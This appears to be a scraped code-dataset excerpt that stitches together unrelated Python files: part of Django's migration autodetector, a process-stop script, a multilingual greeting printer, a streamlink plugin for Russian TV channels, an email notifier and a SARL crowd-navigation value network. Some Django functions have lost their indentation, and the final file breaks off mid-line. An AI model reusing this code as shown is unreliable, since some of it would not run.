                    order_with_respect_to=order_with_respect_to,
                ),
                dependencies=[
                    (app_label, model_name, order_with_respect_to, True),
                    (app_label, model_name, None, True),
                ]
            )
def generate_created_proxies(self):
    """
    Makes CreateModel statements for proxy models.
    We use the same statements as that way there's less code duplication,
    but of course for proxy models we can skip all that pointless field
    stuff and just chuck out an operation.
    """
    added = set(self.new_proxy_keys) - set(self.old_proxy_keys)
    for app_label, model_name in sorted(added):
        model_state = self.to_state.models[app_label, model_name]
        assert model_state.options.get("proxy", False)
        # Depend on the deletion of any possible non-proxy version of us
        dependencies = [
            (app_label, model_name, None, False),
        ]
        # Depend on all bases
        for base in model_state.bases:
            if isinstance(base, six.string_types) and "." in base:
                base_app_label, base_name = base.split(".", 1)
                dependencies.append((base_app_label, base_name, None, True))
        # Generate creation operation
        self.add_operation(
            app_label,
            operations.CreateModel(
                name=model_state.name,
                fields=[],
                options=model_state.options,
                bases=model_state.bases,
            ),
            # Depend on the deletion of any possible non-proxy version of us
            dependencies=dependencies,
        )
def generate_deleted_models(self):
    """
    Find all deleted models (managed and unmanaged) and make delete
    operations for them as well as separate operations to delete any
    foreign key or M2M relationships (we'll optimize these back in later
    if we can).

    We also bring forward removal of any model options that refer to
    collections of fields - the inverse of generate_created_models().
    """
    deleted_models = set(self.old_model_keys) - set(self.new_model_keys)
    deleted_unmanaged_models = set(self.old_unmanaged_keys) - set(self.new_unmanaged_keys)
    models = chain(sorted(deleted_models), sorted(deleted_unmanaged_models))
    for app_label, model_name in models:
        model_state = self.from_state.models[app_label, model_name]
        model = self.old_apps.get_model(app_label, model_name)
        if not model._meta.managed:
            self.add_operation(
                app_label,
                operations.DeleteModel(
                    name=model_state.name,
                ),
            )
            # Skip here, no need to handle fields for unmanaged models
            continue

        # Gather related fields
        related_fields = {}
        for field in model._meta.local_fields:
            if field.rel:
                if field.rel.to:
                    related_fields[field.name] = field
                # through will be none on M2Ms on swapped-out models;
                # we can treat lack of through as auto_created=True, though.
                if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
                    related_fields[field.name] = field
        for field in model._meta.local_many_to_many:
            if field.rel.to:
                related_fields[field.name] = field
            if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
                related_fields[field.name] = field
        # Generate option removal first
        unique_together = model_state.options.pop('unique_together', None)
        index_together = model_state.options.pop('index_together', None)
        if unique_together:
            self.add_operation(
                app_label,
                operations.AlterUniqueTogether(
                    name=model_name,
                    unique_together=None,
                )
            )
        if index_together:
            self.add_operation(
                app_label,
                operations.AlterIndexTogether(
                    name=model_name,
                    index_together=None,
                )
            )
        # Then remove each related field
        for name, field in sorted(related_fields.items()):
            self.add_operation(
                app_label,
                operations.RemoveField(
                    model_name=model_name,
                    name=name,
                )
            )
        # Finally, remove the model.
        # This depends on both the removal/alteration of all incoming fields
        # and the removal of all its own related fields, and if it's
        # a through model the field that references it.
        dependencies = []
        for related_object in model._meta.get_all_related_objects():
            dependencies.append((
                related_object.model._meta.app_label,
                related_object.model._meta.object_name,
                related_object.field.name,
                False,
            ))
            dependencies.append((
                related_object.model._meta.app_label,
                related_object.model._meta.object_name,
                related_object.field.name,
                "alter",
            ))
        for related_object in model._meta.get_all_related_many_to_many_objects():
            dependencies.append((
                related_object.model._meta.app_label,
                related_object.model._meta.object_name,
                related_object.field.name,
                False,
            ))
        for name, field in sorted(related_fields.items()):
            dependencies.append((app_label, model_name, name, False))
        # We're referenced in another field's through=
        through_user = self.through_users.get((app_label, model_state.name.lower()), None)
        if through_user:
            dependencies.append((through_user[0], through_user[1], through_user[2], False))
        # Finally, make the operation, deduping any dependencies
        self.add_operation(
            app_label,
            operations.DeleteModel(
                name=model_state.name,
            ),
            dependencies=list(set(dependencies)),
        )
def generate_deleted_proxies(self):
    """
    Makes DeleteModel statements for proxy models.
    """
    deleted = set(self.old_proxy_keys) - set(self.new_proxy_keys)
    for app_label, model_name in sorted(deleted):
        model_state = self.from_state.models[app_label, model_name]
        # Only proxies belong in this pass; real models are handled by
        # generate_deleted_models().
        assert model_state.options.get("proxy", False)
        self.add_operation(
            app_label,
            operations.DeleteModel(
                name=model_state.name,
            ),
        )
def generate_renamed_fields(self):
    """
    Works out renamed fields
    """
    self.renamed_fields = {}
    for app_label, model_name, field_name in sorted(self.new_field_keys - self.old_field_keys):
        old_model_name = self.renamed_models.get((app_label, model_name), model_name)
        old_model_state = self.from_state.models[app_label, old_model_name]
        field = self.new_apps.get_model(app_label, model_name)._meta.get_field_by_name(field_name)[0]
        # Scan to see if this is actually a rename!
        field_dec = self.deep_deconstruct(field)
        for rem_app_label, rem_model_name, rem_field_name in sorted(self.old_field_keys - self.new_field_keys):
            if rem_app_label == app_label and rem_model_name == model_name:
                old_field_dec = self.deep_deconstruct(old_model_state.get_field_by_name(rem_field_name))
                # Map the old 'to' through any model renames so the
                # deconstructions compare equal.
                if field.rel and field.rel.to and 'to' in old_field_dec[2]:
                    old_rel_to = old_field_dec[2]['to']
                    if old_rel_to in self.renamed_models_rel:
                        old_field_dec[2]['to'] = self.renamed_models_rel[old_rel_to]
                if old_field_dec == field_dec:
                    if self.questioner.ask_rename(model_name, rem_field_name, field_name, field):
                        self.add_operation(
                            app_label,
                            operations.RenameField(
                                model_name=model_name,
                                old_name=rem_field_name,
                                new_name=field_name,
                            )
                        )
                        self.old_field_keys.remove((rem_app_label, rem_model_name, rem_field_name))
                        self.old_field_keys.add((app_label, model_name, field_name))
                        self.renamed_fields[app_label, model_name, field_name] = rem_field_name
                        break
def generate_added_fields(self):
    """
    Fields that have been added
    """
    for app_label, model_name, field_name in sorted(self.new_field_keys - self.old_field_keys):
        field = self.new_apps.get_model(app_label, model_name)._meta.get_field_by_name(field_name)[0]
        # Fields that are foreignkeys/m2ms depend on stuff
        dependencies = []
        if field.rel and field.rel.to:
            # Account for FKs to swappable models
            swappable_setting = getattr(field, 'swappable_setting', None)
            if swappable_setting is not None:
                dep_app_label = "__setting__"
                dep_object_name = swappable_setting
            else:
                dep_app_label = field.rel.to._meta.app_label
                dep_object_name = field.rel.to._meta.object_name
            dependencies = [(dep_app_label, dep_object_name, None, True)]
            if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
                dependencies.append((
                    field.rel.through._meta.app_label,
                    field.rel.through._meta.object_name,
                    None,
                    True
                ))
        # You can't just add NOT NULL fields with no default
        if not field.null and not field.has_default() and not isinstance(field, models.ManyToManyField):
            # Clone before mutating so the state's field object is untouched.
            field = field.clone()
            field.default = self.questioner.ask_not_null_addition(field_name, model_name)
            self.add_operation(
                app_label,
                operations.AddField(
                    model_name=model_name,
                    name=field_name,
                    field=field,
                    preserve_default=False,
                ),
                dependencies=dependencies,
            )
        else:
            self.add_operation(
                app_label,
                operations.AddField(
                    model_name=model_name,
                    name=field_name,
                    field=field,
                ),
                dependencies=dependencies,
            )
def generate_removed_fields(self):
    """
    Fields that have been removed.
    """
    for app_label, model_name, field_name in sorted(self.old_field_keys - self.new_field_keys):
        self.add_operation(
            app_label,
            operations.RemoveField(
                model_name=model_name,
                name=field_name,
            ),
            # We might need to depend on the removal of an order_with_respect_to;
            # this is safely ignored if there isn't one
            dependencies=[(app_label, model_name, field_name, "order_wrt_unset")],
        )
def generate_altered_fields(self):
    """
    Fields that have been altered.
    """
    for app_label, model_name, field_name in sorted(self.old_field_keys.intersection(self.new_field_keys)):
        # Did the field change?
        old_model_name = self.renamed_models.get((app_label, model_name), model_name)
        new_model_state = self.to_state.models[app_label, model_name]
        old_field_name = self.renamed_fields.get((app_label, model_name, field_name), field_name)
        old_field = self.old_apps.get_model(app_label, old_model_name)._meta.get_field_by_name(old_field_name)[0]
        new_field = self.new_apps.get_model(app_label, model_name)._meta.get_field_by_name(field_name)[0]
        # Implement any model renames on relations; these are handled by RenameModel
        # so we need to exclude them from the comparison
        if hasattr(new_field, "rel") and getattr(new_field.rel, "to", None):
            rename_key = (
                new_field.rel.to._meta.app_label,
                new_field.rel.to._meta.object_name.lower(),
            )
            if rename_key in self.renamed_models:
                new_field.rel.to = old_field.rel.to
        old_field_dec = self.deep_deconstruct(old_field)
        new_field_dec = self.deep_deconstruct(new_field)
        if old_field_dec != new_field_dec:
            self.add_operation(
                app_label,
                operations.AlterField(
                    model_name=model_name,
                    name=field_name,
                    field=new_model_state.get_field_by_name(field_name),
                )
            )
def _generate_altered_foo_together(self, operation):
option_name = operation.option_name
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
# We run the old version through the field renames to account for those
old_value = old_model_state.options.get(option_name) or set()
if old_value:
old_value = set([
tuple(
self.renamed_fields.get((app_label, model_name, n), n)
for n in unique
)
for unique in old_value
])
new_value = new_model_state.options.get(option_name) or set()
if new_value:
new_value = set(new_value)
if old_value != new_value:
self.add_operation(
app_label,
operation(
name=model_name,
**{option_name: new_value}
)
)
    def generate_altered_unique_together(self):
        # Delegate to the shared option differ with the unique_together operation.
        self._generate_altered_foo_together(operations.AlterUniqueTogether)
    def generate_altered_index_together(self):
        # Delegate to the shared option differ with the index_together operation.
        self._generate_altered_foo_together(operations.AlterIndexTogether)
def generate_altered_options(self):
"""
Works out if any non-schema-affecting options have changed and
makes an operation to represent them in state changes (in case Python
code in migrations needs them)
"""
models_to_check = self.kept_model_keys.union(self.kept_proxy_keys).union(self.kept_unmanaged_keys)
for app_label, model_name in sorted(models_to_check):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
old_options = dict(
option for option in old_model_state.options.items()
if option[0] in AlterModelOptions.ALTER_OPTION_KEYS
)
new_options = dict(
option for option in new_model_state.options.items()
if option[0] in AlterModelOptions.ALTER_OPTION_KEYS
)
if old_options != new_options:
self.add_operation(
app_label,
operations.AlterModelOptions(
name=model_name,
options=new_options,
)
)
    def generate_altered_order_with_respect_to(self):
        """Emit AlterOrderWithRespectTo when the option differs between states."""
        for app_label, model_name in sorted(self.kept_model_keys):
            old_model_name = self.renamed_models.get((app_label, model_name), model_name)
            old_model_state = self.from_state.models[app_label, old_model_name]
            new_model_state = self.to_state.models[app_label, model_name]
            if old_model_state.options.get("order_with_respect_to", None) != new_model_state.options.get("order_with_respect_to", None):
                # Make sure it comes second if we're adding
                # (removal dependency is part of RemoveField)
                dependencies = []
                if new_model_state.options.get("order_with_respect_to", None):
                    # Depend on the target field's AddField (flag True = "field added").
                    dependencies.append((
                        app_label,
                        model_name,
                        new_model_state.options["order_with_respect_to"],
                        True,
                    ))
                # Actually generate the operation
                self.add_operation(
                    app_label,
                    operations.AlterOrderWithRespectTo(
                        name=model_name,
                        order_with_respect_to=new_model_state.options.get('order_with_respect_to', None),
                    ),
                    dependencies=dependencies,
                )
    def arrange_for_graph(self, changes, graph, migration_name=None):
        """
        Takes in a result from changes() and a MigrationGraph,
        and fixes the names and dependencies of the changes so they
        extend the graph from the leaf nodes for each app.

        changes: dict mapping app_label -> list of Migration objects.
        graph: the loaded MigrationGraph; its leaf nodes anchor numbering.
        migration_name: optional override for the auto-suggested name part.
        Returns the (mutated) changes dict.
        """
        leaves = graph.leaf_nodes()
        name_map = {}
        for app_label, migrations in list(changes.items()):
            if not migrations:
                continue
            # Find the app label's current leaf node
            app_leaf = None
            for leaf in leaves:
                if leaf[0] == app_label:
                    app_leaf = leaf
                    break
            # Do they want an initial migration for this app?
            if app_leaf is None and not self.questioner.ask_initial(app_label):
                # They don't.
                for migration in migrations:
                    name_map[(app_label, migration.name)] = (app_label, "__first__")
                del changes[app_label]
                continue
            # Work out the next number in the sequence
            if app_leaf is None:
                next_number = 1
            else:
                next_number = (self.parse_number(app_leaf[1]) or 0) + 1
            # Name each migration
            for i, migration in enumerate(migrations):
                if i == 0 and app_leaf:
                    # First new migration continues from the current leaf.
                    migration.dependencies.append(app_leaf)
                if i == 0 and not app_leaf:
                    new_name = "0001_%s" % migration_name if migration_name else "0001_initial"
                else:
                    new_name = "%04i_%s" % (
                        next_number,
                        migration_name or self.suggest_name(migration.operations)[:100],
                    )
                name_map[(app_label, migration.name)] = (app_label, new_name)
                next_number += 1
                migration.name = new_name
        # Now fix dependencies
        for app_label, migrations in changes.items():
            for migration in migrations:
                migration.dependencies = [name_map.get(d, d) for d in migration.dependencies]
        return changes
def _trim_to_apps(self, changes, app_labels):
"""
Takes changes from arrange_for_graph and set of app labels and
returns a modified set of changes which trims out as many migrations
that are not in app_labels as possible.
Note that some other migrations may still be present, as they may be
required dependencies.
"""
# Gather other app dependencies in a first pass
app_dependencies = {}
for app_label, migrations in changes.items():
for migration in migrations:
for dep_app_label, name in migration.dependencies:
app_dependencies.setdefault(app_label, set()).add(dep_app_label)
required_apps = set(app_labels)
# Keep resolving till there's no change
old_required_apps = None
while old_required_apps != required_apps:
old_required_apps = set(required_apps)
for app_label in list(required_apps):
required_apps.update(app_dependencies.get(app_label, set()))
# Remove all migrations that aren't needed
for app_label in list(changes.keys()):
if app_label not in required_apps:
del changes[app_label]
return changes
    @classmethod
    def suggest_name(cls, ops):
        """
        Given a set of operations, suggests a name for the migration
        they might represent. Names are not guaranteed to be unique,
        but we put some effort in to the fallback name to avoid VCS conflicts
        if we can.
        """
        # Single-operation migrations get a descriptive name derived from the
        # operation; anything else falls through to a timestamped "auto_" name.
        if len(ops) == 1:
            if isinstance(ops[0], operations.CreateModel):
                return ops[0].name.lower()
            elif isinstance(ops[0], operations.DeleteModel):
                return "delete_%s" % ops[0].name.lower()
            elif isinstance(ops[0], operations.AddField):
                return "%s_%s" % (ops[0].model_name.lower(), ops[0].name.lower())
            elif isinstance(ops[0], operations.RemoveField):
                return "remove_%s_%s" % (ops[0].model_name.lower(), ops[0].name.lower())
        elif len(ops) > 1:
            # All-CreateModel migrations are named after the created models.
            if all(isinstance(o, operations.CreateModel) for o in ops):
                return "_".join(sorted(o.name.lower() for o in ops))
        return "auto_%s" % datetime.datetime.now().strftime("%Y%m%d_%H%M")
    @classmethod
    def parse_number(cls, name):
        """
        Given a migration name, tries to extract a number from the
        beginning of it. If no number found, returns None.
        """
        # Only a leading digit run followed by "_" counts (e.g. "0002_foo").
        if re.match(r"^\d+_", name):
            return int(name.split("_")[0])
        return None
| 48.226504 | 166 | 0.564146 |
dfb6047fbe6b560b57045a08d9b45a7fd849fc4c | 530 | py | Python | plico_dm_server/scripts/plico_dm_stop.py | lbusoni/palpao_server | 4531fc60904433c81bdad1e631cd06c4ae13e76c | [
"MIT"
] | null | null | null | plico_dm_server/scripts/plico_dm_stop.py | lbusoni/palpao_server | 4531fc60904433c81bdad1e631cd06c4ae13e76c | [
"MIT"
] | 3 | 2022-01-19T23:58:01.000Z | 2022-02-25T12:15:49.000Z | plico_dm_server/scripts/plico_dm_stop.py | ArcetriAdaptiveOptics/plico_dm_server | da8d2797ac92a4c12d034a0c2da4b50a074beade | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import logging
from plico.utils.kill_process_by_name import killProcessByName
from plico_dm_server.utils.constants import Constants
__version__= "$Id: plico_dm_stop.py 27 2018-01-27 08:48:07Z lbusoni $"
def main():
    """Stop the plico_dm server by killing its known processes by name."""
    logging.basicConfig(level=logging.INFO)
    # The launcher plus both deformable-mirror controller processes.
    for process_name in (Constants.START_PROCESS_NAME,
                         Constants.controller_1_PROCESS_NAME,
                         Constants.controller_2_PROCESS_NAME):
        killProcessByName(process_name)
| 27.894737 | 70 | 0.707547 |
cf7e9adfb2d71939c0a362af95850b25eff02587 | 2,203 | py | Python | python/Howdy/MultiLingual.py | PaulAustin/sb7 | e7e7f9f85387d16f6069ed8e98192bd387d8cf95 | [
"MIT"
] | null | null | null | python/Howdy/MultiLingual.py | PaulAustin/sb7 | e7e7f9f85387d16f6069ed8e98192bd387d8cf95 | [
"MIT"
] | null | null | null | python/Howdy/MultiLingual.py | PaulAustin/sb7 | e7e7f9f85387d16f6069ed8e98192bd387d8cf95 | [
"MIT"
] | null | null | null |
greetings = {
"Italian": "Ciao mondo",
"Irish": "Dia duit Domhanda",
"French": "Bonjour le monde",
"English": "Hello World",
"Australian": "G'day World",
"German": "Hallo Welt",
"Hungarian": "Helló Világ",
"Czech": "Ahoj světe",
"Dutch": "Hallo Wereld",
"Danish": "Hej Verden",
"Swedish": "Hej världen",
"Lithuanian": "Labas pasauli",
"Latin": "salve Orbis Terrarum",
"Spanish" : "Hola Mundo",
"Catalan" : "Hola món",
"Hawaiian": "Aloha kākou honua",
"Afrikaans": "Hello Wêreld",
"Swahili" : "Salamu, Dunia",
"Zulu": "Sawubona Mhlaba",
"Greek": "Γειά σου Κόσμε",
"Uyghur": "ياخشىمۇسىز دۇنيا",
"Urdu": "ہیلو ورلڈ",
"Arabic": "مرحبا بالعالم",
"Sindhi": "هيلو ورلڊ",
"Hebrew": "שלום עולם",
"Yiddish": "העלא וועלט",
"Armenian": "Բարեւ աշխարհ",
"Mongolian": "Сайн уу",
"Chinese": "你好,世界",
"Korean": "안녕 세상",
"Japanese": "こんにちは世界",
"Vietnamese": "Chào thế giới",
"Lao": "ສະບາຍດີຊາວໂລກ",
"Burmese": "မင်္ဂလာပါကမ္ဘာလောက",
"Thai": "สวัสดีชาวโลก",
"Telugu": "హలో వరల్డ్",
"Hindi" : "नमस्ते दुनिया",
"Tamil": "ஹலோ வேர்ல்ட்",
"Gujarati": "હેલો વર્લ્ડ",
"Nepali": "नमस्कार संसार",
"Marathi": "हॅलो वर्ल्ड",
"Malayalam": "ഹലോ വേൾഡ്",
"Bangla": "ওহে বিশ্ব",
"Kannada": "ಹಲೋ ವರ್ಲ್ಡ್",
"Sinhala": "හෙලෝ වර්ල්ඩ්",
"Russian": "Привет, мир",
"Kyrgyz": "салам дүйнө",
"Ukranian": "Привіт Світ",
"Bulgarian": "Здравей свят",
"Macedonian": "Здраво свету",
"Tajik": "Салом Ҷаҳон",
"Tatar" : "Сәлам, Дөнья",
"Uzbek": "Salom Dunyo",
"Polish": "Witaj świecie",
"Georgian": "Გამარჯობა მსოფლიო",
}
def main():
    """Print every greeting with its character count and language name."""
    for lang, message in greetings.items():
        print("Howdy", len(message), lang, message)


# Guard the entry point: importing this module should not print anything.
# (Previously main() ran unconditionally at import time; dead commented-out
# per-character debug code was also removed.)
if __name__ == "__main__":
    main()
| 28.61039 | 43 | 0.460735 |
7db29590c736b1cad9768e649bbc4e836fdd1c43 | 2,700 | py | Python | src/streamlink/plugins/mediavitrina.py | melmorabity/streamlink | 24c59a23103922977991acc28741a323d8efa7a1 | [
"BSD-2-Clause"
] | null | null | null | src/streamlink/plugins/mediavitrina.py | melmorabity/streamlink | 24c59a23103922977991acc28741a323d8efa7a1 | [
"BSD-2-Clause"
] | null | null | null | src/streamlink/plugins/mediavitrina.py | melmorabity/streamlink | 24c59a23103922977991acc28741a323d8efa7a1 | [
"BSD-2-Clause"
] | null | null | null | import logging
import re
from streamlink.plugin import Plugin, pluginmatcher
from streamlink.plugin.api import validate
from streamlink.stream import HLSStream
from streamlink.utils.url import update_qsd
log = logging.getLogger(__name__)
@pluginmatcher(re.compile(
r"https?://(?P<channel>ctc(?:love)?|chetv|domashniy|5-tv)\.ru/(?:online|live)"
))
@pluginmatcher(re.compile(
r"https?://(?P<channel>ren)\.tv/live"
))
@pluginmatcher(re.compile(
r"https?://player\.mediavitrina\.ru/(?P<channel>[^/?]+.)(?:/[^/]+)?/\w+/player\.html"
))
class MediaVitrina(Plugin):
def _get_streams(self):
channel = self.match.group("channel")
channels = [
# ((channels), (path, channel))
(("5-tv", "tv-5", "5tv"), ("tv5", "tv-5")),
(("chetv", "ctc-che", "che_ext"), ("ctc", "ctc-che")),
(("ctc"), ("ctc", "ctc")),
(("ctclove", "ctc-love", "ctc_love_ext"), ("ctc", "ctc-love")),
(("domashniy", "ctc-dom", "domashniy_ext"), ("ctc", "ctc-dom")),
(("iz"), ("iz", "iz")),
(("mir"), ("mtrkmir", "mir")),
(("muztv"), ("muztv", "muztv")),
(("ren", "ren-tv", "rentv"), ("nmg", "ren-tv")),
(("russia1"), ("vgtrk", "russia1")),
(("russia24"), ("vgtrk", "russia24")),
(("russiak", "kultura"), ("vgtrk", "russiak")),
(("spas"), ("spas", "spas")),
(("tvc"), ("tvc", "tvc")),
(("tvzvezda", "zvezda"), ("zvezda", "zvezda")),
(("u", "u_ott"), ("utv", "u_ott")),
]
for c in channels:
if channel in c[0]:
path, channel = c[1]
break
else:
log.error(f"Unsupported channel: {channel}")
return
res_token = self.session.http.get(
"https://media.mediavitrina.ru/get_token",
schema=validate.Schema(
validate.parse_json(),
{"result": {"token": str}},
validate.get("result"),
))
url = self.session.http.get(
update_qsd(f"https://media.mediavitrina.ru/api/v2/{path}/playlist/{channel}_as_array.json", qsd=res_token),
schema=validate.Schema(
validate.parse_json(),
{"hls": [validate.url()]},
validate.get("hls"),
validate.get(0),
))
if not url:
return
if "georestrictions" in url:
log.error("Stream is geo-restricted")
return
yield from HLSStream.parse_variant_playlist(self.session, url, name_fmt="{pixels}_{bitrate}").items()
__plugin__ = MediaVitrina
| 34.615385 | 119 | 0.505556 |
a3b6f56ce5f62508cce22f75f3548c02ef5c52fd | 238 | py | Python | features/steps/test_starter/{{ cookiecutter.repo_name }}/src/{{ cookiecutter.python_package }}/pipelines/data_science/__init__.py | daniel-falk/kedro | 19187199339ddc4a757aaaa328f319ec4c1e452a | [
"Apache-2.0"
] | 2,047 | 2022-01-10T15:22:12.000Z | 2022-03-31T13:38:56.000Z | features/steps/test_starter/{{ cookiecutter.repo_name }}/src/{{ cookiecutter.python_package }}/pipelines/data_science/__init__.py | daniel-falk/kedro | 19187199339ddc4a757aaaa328f319ec4c1e452a | [
"Apache-2.0"
] | 170 | 2022-01-10T12:44:31.000Z | 2022-03-31T17:01:24.000Z | features/steps/test_starter/{{ cookiecutter.repo_name }}/src/{{ cookiecutter.python_package }}/pipelines/data_science/__init__.py | daniel-falk/kedro | 19187199339ddc4a757aaaa328f319ec4c1e452a | [
"Apache-2.0"
] | 112 | 2022-01-10T19:15:24.000Z | 2022-03-30T11:20:52.000Z | """Example code for the nodes in the example pipeline. This code is meant
just for illustrating basic Kedro features.
PLEASE DELETE THIS FILE ONCE YOU START WORKING ON YOUR OWN PROJECT!
"""
from .pipeline import create_pipeline # NOQA
| 29.75 | 73 | 0.781513 |
1373129657f5b21c1aeafaa047d30c85dbe40199 | 3,557 | py | Python | src/communications/destination_email.py | tomgilbertson/script-server-v1 | bbdf289d3d993a0c81f20c36bce5f3eb064b0261 | [
"Apache-2.0",
"CC0-1.0"
] | 833 | 2016-09-08T13:27:36.000Z | 2022-03-27T07:10:48.000Z | src/communications/destination_email.py | tomgilbertson/script-server-v1 | bbdf289d3d993a0c81f20c36bce5f3eb064b0261 | [
"Apache-2.0",
"CC0-1.0"
] | 528 | 2016-05-23T09:17:04.000Z | 2022-03-30T12:45:50.000Z | src/communications/destination_email.py | tomgilbertson/script-server-v1 | bbdf289d3d993a0c81f20c36bce5f3eb064b0261 | [
"Apache-2.0",
"CC0-1.0"
] | 214 | 2016-09-08T14:46:41.000Z | 2022-03-25T01:04:14.000Z | import smtplib
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import formatdate
from communications import destination_base
from model import model_helper
from model.model_helper import read_bool_from_config
def split_addresses(addresses_string):
if ',' in addresses_string:
return addresses_string.split(',')
if ';' in addresses_string:
return addresses_string.split(';')
return [addresses_string]
def _create_communicator(config):
return EmailCommunicator(config)
def _body_dict_to_message(body_dict):
result = ''
for key, value in body_dict.items():
if result:
result += '\n'
result += key + ': ' + str(value)
return result
class EmailDestination(destination_base.Destination):
def __init__(self, config) -> None:
super().__init__()
self._communicator = _create_communicator(config)
def send(self, title, body, files=None):
if isinstance(body, dict):
body = _body_dict_to_message(body)
self._communicator.send(title, body, files)
class EmailCommunicator:
def __init__(self, params_dict):
self.from_address = params_dict.get('from')
self.to_addresses = params_dict.get('to')
self.server = params_dict.get('server')
self.auth_enabled = read_bool_from_config('auth_enabled', params_dict)
self.login = params_dict.get('login')
self.tls = read_bool_from_config('tls', params_dict)
self.password = self.read_password(params_dict)
self.to_addresses = split_addresses(self.to_addresses)
if not self.from_address:
raise Exception('"from" is compulsory parameter for email destination')
if not self.to_addresses:
raise Exception('"to" is compulsory parameter for email destination')
if not self.server:
raise Exception('"server" is compulsory parameter for email destination')
if self.auth_enabled is None:
self.auth_enabled = self.password or self.login
if self.auth_enabled and (not self.login):
self.login = self.from_address
if (self.tls is None) and ('gmail' in self.server):
self.tls = True
@staticmethod
def read_password(params_dict):
password = params_dict.get('password')
password = model_helper.resolve_env_vars(password, full_match=True)
return password
def send(self, title, body, files=None):
message = MIMEMultipart()
message['From'] = self.from_address
message['To'] = ','.join(self.to_addresses)
message['Date'] = formatdate(localtime=True)
message['Subject'] = title
message.attach(MIMEText(body))
server = smtplib.SMTP(self.server)
server.ehlo()
if self.tls:
server.starttls()
if self.auth_enabled:
server.login(self.login, self.password)
if files:
for file in files:
filename = file.filename
part = MIMEApplication(file.content, Name=filename)
part['Content-Disposition'] = 'attachment; filename="%s"' % filename
message.attach(part)
server.sendmail(self.from_address, self.to_addresses, message.as_string())
server.quit()
def __str__(self, *args, **kwargs):
return 'mail to ' + '; '.join(self.to_addresses) + ' over ' + self.from_address
| 30.144068 | 87 | 0.653641 |
1b3e98c9c632f57b19ac2ed5bca04ac72e9e5cf8 | 4,180 | py | Python | gym_collision_avoidance/envs/policies/LearningCADRL/policy/sarl.py | meghdeepj/Social-Navigation-Simulator | 806d304081bf5ff4fc7a0a58defb050627375865 | [
"MIT"
] | null | null | null | gym_collision_avoidance/envs/policies/LearningCADRL/policy/sarl.py | meghdeepj/Social-Navigation-Simulator | 806d304081bf5ff4fc7a0a58defb050627375865 | [
"MIT"
] | null | null | null | gym_collision_avoidance/envs/policies/LearningCADRL/policy/sarl.py | meghdeepj/Social-Navigation-Simulator | 806d304081bf5ff4fc7a0a58defb050627375865 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
from torch.nn.functional import softmax
import logging
from gym_collision_avoidance.envs.policies.LearningCADRL.policy.cadrl import mlp
from gym_collision_avoidance.envs.policies.LearningCADRL.policy.multi_human_rl import MultiHumanRL
class ValueNetwork(nn.Module):
    """Attention-based value network: embeds each human's joint state,
    pools the embeddings with learned attention weights, and scores the
    pooled feature together with the robot's own state."""
    def __init__(self, input_dim, self_state_dim, mlp1_dims, mlp2_dims, mlp3_dims, attention_dims, with_global_state,
                 cell_size, cell_num):
        super().__init__()
        # Width of the robot's own-state slice at the front of each row.
        self.self_state_dim = self_state_dim
        self.global_state_dim = mlp1_dims[-1]
        self.mlp1 = mlp(input_dim, mlp1_dims, last_relu=True)
        self.mlp2 = mlp(mlp1_dims[-1], mlp2_dims)
        self.with_global_state = with_global_state
        if with_global_state:
            # Scores computed from [per-human embedding, mean embedding].
            self.attention = mlp(mlp1_dims[-1] * 2, attention_dims)
        else:
            self.attention = mlp(mlp1_dims[-1], attention_dims)
        # Occupancy-map grid parameters (stored only; not read in forward).
        self.cell_size = cell_size
        self.cell_num = cell_num
        mlp3_input_dim = mlp2_dims[-1] + self.self_state_dim
        self.mlp3 = mlp(mlp3_input_dim, mlp3_dims)
        # Softmax weights of the first batch element, saved for inspection.
        self.attention_weights = None
    def forward(self, state):
        """
        First transform the world coordinates to self-centric coordinates and then do forward computation
        :param state: tensor of shape (batch_size, # of humans, length of a rotated state)
        :return:
        """
        size = state.shape
        # The robot's own state is replicated per human row; take row 0's copy.
        self_state = state[:, 0, :self.self_state_dim]
        mlp1_output = self.mlp1(state.view((-1, size[2])))
        mlp2_output = self.mlp2(mlp1_output)
        if self.with_global_state:
            # compute attention scores
            global_state = torch.mean(mlp1_output.view(size[0], size[1], -1), 1, keepdim=True)
            global_state = global_state.expand((size[0], size[1], self.global_state_dim)).\
                contiguous().view(-1, self.global_state_dim)
            attention_input = torch.cat([mlp1_output, global_state], dim=1)
        else:
            attention_input = mlp1_output
        scores = self.attention(attention_input).view(size[0], size[1], 1).squeeze(dim=2)
        # masked softmax
        # weights = softmax(scores, dim=1).unsqueeze(2)
        # Zero scores are treated as masked entries and excluded from the softmax.
        scores_exp = torch.exp(scores) * (scores != 0).float()
        weights = (scores_exp / torch.sum(scores_exp, dim=1, keepdim=True)).unsqueeze(2)
        self.attention_weights = weights[0, :, 0].data.cpu().numpy()
        # output feature is a linear combination of input features
        features = mlp2_output.view(size[0], size[1], -1)
        # for converting to onnx
        # expanded_weights = torch.cat([torch.zeros(weights.size()).copy_(weights) for _ in range(50)], dim=2)
        weighted_feature = torch.sum(torch.mul(weights, features), dim=1)
        # concatenate agent's state with global weighted humans' state
        joint_state = torch.cat([self_state, weighted_feature], dim=1)
        value = self.mlp3(joint_state)
        return value
class SARL(MultiHumanRL):
    """Value-network policy using attention over humans (SARL / OM-SARL)."""
    def __init__(self):
        super().__init__()
        self.name = 'SARL'
    def configure(self, config):
        # Parse layer sizes (comma-separated ints) from the [sarl] config
        # section and build the value network.
        self.set_common_parameters(config)
        mlp1_dims = [int(x) for x in config.get('sarl', 'mlp1_dims').split(', ')]
        mlp2_dims = [int(x) for x in config.get('sarl', 'mlp2_dims').split(', ')]
        mlp3_dims = [int(x) for x in config.get('sarl', 'mlp3_dims').split(', ')]
        attention_dims = [int(x) for x in config.get('sarl', 'attention_dims').split(', ')]
        self.with_om = config.getboolean('sarl', 'with_om')
        with_global_state = config.getboolean('sarl', 'with_global_state')
        self.model = ValueNetwork(self.input_dim(), self.self_state_dim, mlp1_dims, mlp2_dims, mlp3_dims,
